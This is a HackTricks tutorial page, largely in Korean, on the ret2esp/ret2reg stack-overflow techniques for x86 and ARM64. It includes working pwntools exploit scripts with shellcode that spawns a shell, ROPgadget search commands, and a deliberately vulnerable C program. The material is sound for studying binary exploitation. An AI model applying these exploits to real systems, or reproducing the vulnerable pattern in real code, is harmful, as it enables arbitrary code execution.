Ret2esp / Ret2reg

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Ret2esp

ESP(스택 포인터)는 항상 스택의 맨 위를 가리키기 때문에, 이 기술은 EIP(명령 포인터)를 jmp esp 또는 call esp 명령의 주소로 교체하는 것을 포함합니다. 이렇게 하면 셸코드가 덮어쓴 EIP 바로 뒤에 배치됩니다. ret 명령이 실행되면 ESP는 다음 주소를 가리키며, 정확히 셸코드가 저장된 위치입니다.

**주소 공간 배치 무작위화(ASLR)**가 Windows 또는 Linux에서 활성화되지 않은 경우, 공유 라이브러리에서 발견된 jmp esp 또는 call esp 명령을 사용할 수 있습니다. 그러나 ASLR이 활성화된 경우, 이러한 명령을 찾기 위해 취약한 프로그램 자체를 살펴봐야 할 수 있습니다(그리고 PIE를 우회해야 할 수도 있습니다).

게다가 EIP 손상 이후에 셸코드를 배치할 수 있는 것은, 스택의 중간이 아닌, 함수의 작동 중에 실행되는 push 또는 pop 명령이 셸코드에 간섭하지 않도록 보장합니다. 셸코드가 함수의 스택 중간에 배치되었다면 이러한 간섭이 발생할 수 있습니다.

공간 부족

RIP를 덮어쓴 후에 쓸 공간이 부족한 경우(아마도 몇 바이트 정도), 다음과 같은 초기 jmp 셸코드를 작성하세요:

sub rsp, 0x30
jmp rsp

그리고 스택의 초기에 셸코드를 작성합니다.

예시

이 기술의 예시는 https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp에서 찾을 수 있으며, 최종 익스플로잇은 다음과 같습니다:

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

jmp_rsp = next(elf.search(asm('jmp rsp')))

payload = b'A' * 120
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 10;
jmp rsp;
''')

pause()
p.sendlineafter('RSP!\n', payload)
p.interactive()

이 기술의 또 다른 예는 https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html에서 볼 수 있습니다. NX가 활성화되지 않은 상태에서 버퍼 오버플로우가 발생하며, $esp의 주소를 줄이기 위해 가젯을 사용한 다음, 셸코드로 점프하기 위해 jmp esp;를 사용합니다:

# From https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html
from pwn import *

# Establish the target process
target = process('./b0verflow')
#gdb.attach(target, gdbscript = 'b *0x080485a0')

# The shellcode we will use
# I did not write this, it is from: http://shell-storm.org/shellcode/files/shellcode-827.php
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

# Establish our rop gadgets

# 0x08048504 : jmp esp
jmpEsp = p32(0x08048504)

# 0x080484fd : push ebp ; mov ebp, esp ; sub esp, 0x24 ; ret
pivot = p32(0x80484fd)

# Make the payload

payload = ""
payload += jmpEsp # Our jmp esp gadget
payload += shellcode # Our shellcode
payload += "1"*(0x20 - len(shellcode)) # Filler between end of shellcode and saved return address
payload += pivot # Our pivot gadget

# Send our payload
target.sendline(payload)

# Drop to an interactive shell
target.interactive()

Ret2reg

유사하게, 함수가 쉘코드가 저장된 주소를 반환하는 것을 알고 있다면, call eax 또는 jmp eax 명령어(일명 ret2eax 기법)를 활용하여 쉘코드를 실행할 수 있는 또 다른 방법을 제공합니다. eax와 마찬가지로, 흥미로운 주소를 포함하는 다른 레지스터도 사용할 수 있습니다(ret2reg).

Example

여기에서 몇 가지 예를 찾을 수 있습니다:

https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg
https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c
**strcpy**는 쉘코드가 저장된 버퍼의 주소를 **eax**에 저장하고 **eax**는 덮어쓰이지 않으므로 ret2eax를 사용할 수 있습니다.

ARM64

Ret2sp

ARM64에서는 SP 레지스터로 점프할 수 있는 명령어가 없습니다. sp를 레지스터로 이동시키고 그 레지스터로 점프하는 가젯을 찾는 것이 가능할 수 있지만, 내 Kali의 libc에서는 그런 가젯을 찾을 수 없었습니다:

for i in `seq 1 30`; do
ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei "[mov|add] x${i}, sp.* ; b[a-z]* x${i}( |$)";
done

내가 발견한 유일한 방법은 sp가 점프하기 전에 복사된 레지스트리의 값을 변경하는 것이었다(그래서 그것은 쓸모없게 된다):

Ret2reg

레지스트리에 흥미로운 주소가 있다면 적절한 명령어를 찾아 점프하는 것이 가능하다. 다음과 같은 방법을 사용할 수 있다:

ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei " b[a-z]* x[0-9][0-9]?";

ARM64에서는 **x0**가 함수의 반환 값을 저장하므로, x0가 사용자가 제어하는 버퍼의 주소를 저장하고 있을 수 있으며, 이 버퍼에는 실행할 쉘코드가 포함되어 있습니다.

예제 코드:

// clang -o ret2x0 ret2x0.c -no-pie -fno-stack-protector -Wno-format-security -z execstack

#include <stdio.h>
#include <string.h>

void do_stuff(int do_arg){
if (do_arg == 1)
__asm__("br x0");
return;
}

char* vulnerable_function() {
char buffer[64];
fgets(buffer, sizeof(buffer)*3, stdin);
return buffer;
}

int main(int argc, char **argv) {
char* b = vulnerable_function();
do_stuff(2)
return 0;
}

함수의 디스어셈블리를 확인하면 버퍼에 대한 주소(bof에 취약하며 사용자에 의해 제어됨)가 x0에 저장된 것을 볼 수 있습니다. 이는 버퍼 오버플로우에서 반환하기 전에 발생합니다:

또한 do_stuff 함수에서 br x0 가젯을 찾을 수 있습니다:

우리는 이 가젯을 사용하여 점프할 것입니다. 이진 파일은 PIE 없이 컴파일되었습니다. 패턴을 사용하여 버퍼 오버플로우의 오프셋이 80임을 확인할 수 있으므로, 익스플로잇은 다음과 같습니다:

from pwn import *

p = process('./ret2x0')
elf = context.binary = ELF('./ret2x0')

stack_offset = 72
shellcode = asm(shellcraft.sh())
br_x0 = p64(0x4006a0) # Addr of: br x0;
payload = shellcode + b"A" * (stack_offset - len(shellcode)) + br_x0

p.sendline(payload)
p.interactive()

fgets 대신 **read**와 같은 것을 사용했다면, 반환 주소의 마지막 2바이트만 덮어쓰는 것으로 br x0; 명령어로 돌아가는 것이 가능했을 것입니다. 전체 주소를 알 필요 없이. fgets는 끝에 널(0x00) 바이트를 추가하기 때문에 작동하지 않습니다.

Protections

NX: 스택이 실행 가능하지 않다면, 스택에 쉘코드를 배치하고 이를 실행하기 위해 점프해야 하므로 도움이 되지 않습니다.
ASLR & PIE: 이는 esp 또는 다른 레지스터로 점프할 수 있는 명령어를 찾기 어렵게 만들 수 있습니다.

References

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousRet2dlresolve NextRet2lib

Last updated 1 day ago